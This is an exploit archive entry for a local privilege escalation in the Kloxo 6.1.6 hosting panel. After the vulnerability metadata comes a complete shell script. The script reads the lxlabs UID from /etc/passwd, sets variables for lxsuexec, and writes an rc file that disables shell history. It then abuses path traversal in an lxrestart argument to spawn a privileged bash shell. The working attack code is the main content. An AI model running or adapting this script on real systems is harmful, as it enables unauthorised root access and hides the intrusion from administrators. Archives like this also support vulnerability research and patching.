Kloxo 6.1.6 Privilege Escalation

Credit: HTP
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-264

#!/bin/sh # Exploit Title: Kloxo Local Privilege Escalation # Google Dork: inurl:kiddies # Date: August 2012 or so # Exploit Author: HTP # Vendor Homepage: http://lxcenter.org/ # Software Link: [download link if available] # Version: 6.1.6 (Latest) # Tested on: CentOS 5 # CVE : None # This exploit requires you to be the Apache user, or another capable of running lxsuexec. LXLABS=`cat /etc/passwd | grep lxlabs | cut -d: -f3` export MUID=$LXLABS export GID=$LXLABS export TARGET=/bin/sh export CHECK_GID=0 export NON_RESIDENT=1 echo "unset HISTFILE HISTSAVE PROMPT_COMMAND TMOUT" >> /tmp/w00trc echo "/usr/sbin/lxrestart '../../../bin/bash --init-file /tmp/w00trc #' " > /tmp/lol lxsuexec /tmp/lol

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